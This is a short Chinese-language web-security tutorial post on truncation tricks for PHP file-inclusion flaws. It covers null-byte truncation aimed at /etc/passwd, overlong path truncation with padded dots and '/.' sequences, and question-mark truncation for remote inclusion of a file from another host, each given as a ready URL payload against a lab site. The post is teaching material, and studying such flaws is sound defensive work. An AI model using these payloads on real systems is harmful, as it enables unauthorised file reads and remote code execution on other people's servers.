php 文件包含 截断,【原创】WEB安全第五章 漏洞学习与利用06文件包含截断

WEB安全第五章 漏洞学习与利用06文件包含截断

1、00截断法

00字符截断(php<5.3.4)

(需要 magic_quotes_gpc=off)

/etc/passwd

/etc/passwd%00

http://include.moonteam.com/file02.php?file=x.jpg%00

00字符截断(php<5.3.4)

(需要 magic_quotes_gpc=off)

/etc/passwd

/etc/passwd%00

http://include.moonteam.com/file02.php?file=x.jpg%00

2、超长文件截断

(php版本小于5.2.8 可以成功，linux需要文件名长于4096，windows需要长于256)

利用操作系统对目录最大长度限制。

在window下256字节

linux下4096字节

截断的字符有

.

http://include.moonteam.com/file02.php?file=x.jpg………………………………………………………………………………………………………………………………………………………………………………………………………………

/.

http://include.moonteam.com/file02.php?file=x.jpg%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e

3、问号截断

适用于远程截断。

php>=5.3

allow_url_fopen On On

allow_url_include On

http://www.webtester.com/include/file02.php?file=http://192.168.0.121/x.txt?

原创文章，作者：mOon，如若转载，请注明出处：https://www.moonsec.com/archives/262